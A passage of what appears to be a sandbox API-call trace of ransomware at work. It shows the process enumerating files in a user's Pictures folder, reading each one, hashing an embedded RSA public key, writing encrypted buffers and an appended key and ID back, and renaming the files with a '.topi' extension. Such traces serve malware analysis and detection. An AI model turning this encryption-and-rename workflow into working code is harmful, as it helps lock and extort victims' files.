lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.575] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.575] GetCurrentThreadId () returned 0x8c4 [0095.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f6610 [0095.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0095.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.576] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.576] GetCurrentThreadId () returned 0x8c4 [0095.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.576] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.576] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.576] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.576] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.576] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.577] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.577] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.577] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.577] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.577] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.577] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.577] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.577] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.577] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.577] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.577] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9558 [0095.577] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.577] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0095.577] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.577] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.577] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.577] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.577] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.577] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9570 [0095.577] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.577] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.577] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.577] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9540 [0095.577] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.577] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.577] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.577] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.577] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.578] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.578] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.578] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9588 [0095.578] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.578] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8eb0 [0095.578] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.578] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0095.578] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.578] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.578] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.578] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.578] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9558 | out: hHeap=0x680000) returned 1 [0095.578] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9558 [0095.578] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.578] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0095.578] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.578] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.578] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.578] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0095.578] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.578] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.578] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.578] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.578] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9558 | out: hHeap=0x680000) returned 1 [0095.578] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.578] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.579] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0095.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0095.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9588 | out: hHeap=0x680000) returned 1 [0095.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9570 | out: hHeap=0x680000) returned 1 [0095.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9540 | out: hHeap=0x680000) returned 1 [0095.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9528 | out: hHeap=0x680000) returned 1 [0095.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f1e30 | out: hHeap=0x680000) returned 1 [0095.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.580] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.580] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.580] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.580] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.580] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.580] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.580] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.580] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.580] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.580] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f72d8*, nNumberOfBytesToWrite=0xd051, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f72d8*, lpNumberOfBytesWritten=0x9ccfb14*=0xd051, lpOverlapped=0x0) returned 1 [0095.580] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f72d8 | out: hHeap=0x680000) returned 1 [0095.580] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xd056, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.580] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.580] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.581] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0095.581] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.581] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.581] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.581] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0095.581] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.581] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.581] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.581] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.581] CloseHandle (hObject=0x6a8) returned 1 [0095.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0095.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x870) returned 0x31cf750 [0095.582] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0095.582] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\jsesP.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\jsesp.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\jsesP.png.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\jsesp.png.topi")) returned 1 [0095.583] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.583] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.583] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.584] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0095.584] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70160590, ftCreationTime.dwHighDateTime=0x1d5c3c6, ftLastAccessTime.dwLowDateTime=0xeca92db0, ftLastAccessTime.dwHighDateTime=0x1d5c04e, ftLastWriteTime.dwLowDateTime=0xeca92db0, ftLastWriteTime.dwHighDateTime=0x1d5c04e, nFileSizeHigh=0x0, nFileSizeLow=0xb489, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="khhc3Ttgbyg.png", cAlternateFileName="KHHC3T~1.PNG")) returned 1 [0095.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0095.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0095.584] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.584] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\khhc3Ttgbyg.png") returned=".png" [0095.584] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\khhc3Ttgbyg.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\khhc3ttgbyg.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.585] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=46217) returned 1 [0095.585] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.587] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xb463, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.587] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.588] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.588] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.588] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xb489, lpOverlapped=0x0) returned 1 [0095.589] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.589] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.589] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.589] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.589] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0095.590] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.590] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.590] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.590] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.590] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.590] GetLastError () returned 0x0 [0095.590] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.590] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0095.590] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.590] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.590] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.590] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.590] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.590] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.590] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.590] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb490) returned 0x99f72d8 [0095.591] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.591] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.591] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.591] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.591] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.591] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.591] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1e30 [0095.591] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9528 [0095.591] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1e78 [0095.591] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9540 [0095.591] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9570 [0095.591] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.591] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9588 [0095.591] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.591] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.591] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.591] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.591] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9570 | out: hHeap=0x680000) returned 1 [0095.591] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9588 | out: hHeap=0x680000) returned 1 [0095.591] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.591] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.591] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.591] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.591] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0095.591] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9588 [0095.591] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0095.591] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9570 [0095.591] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0095.591] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.591] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.591] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.592] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.592] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.592] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.592] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 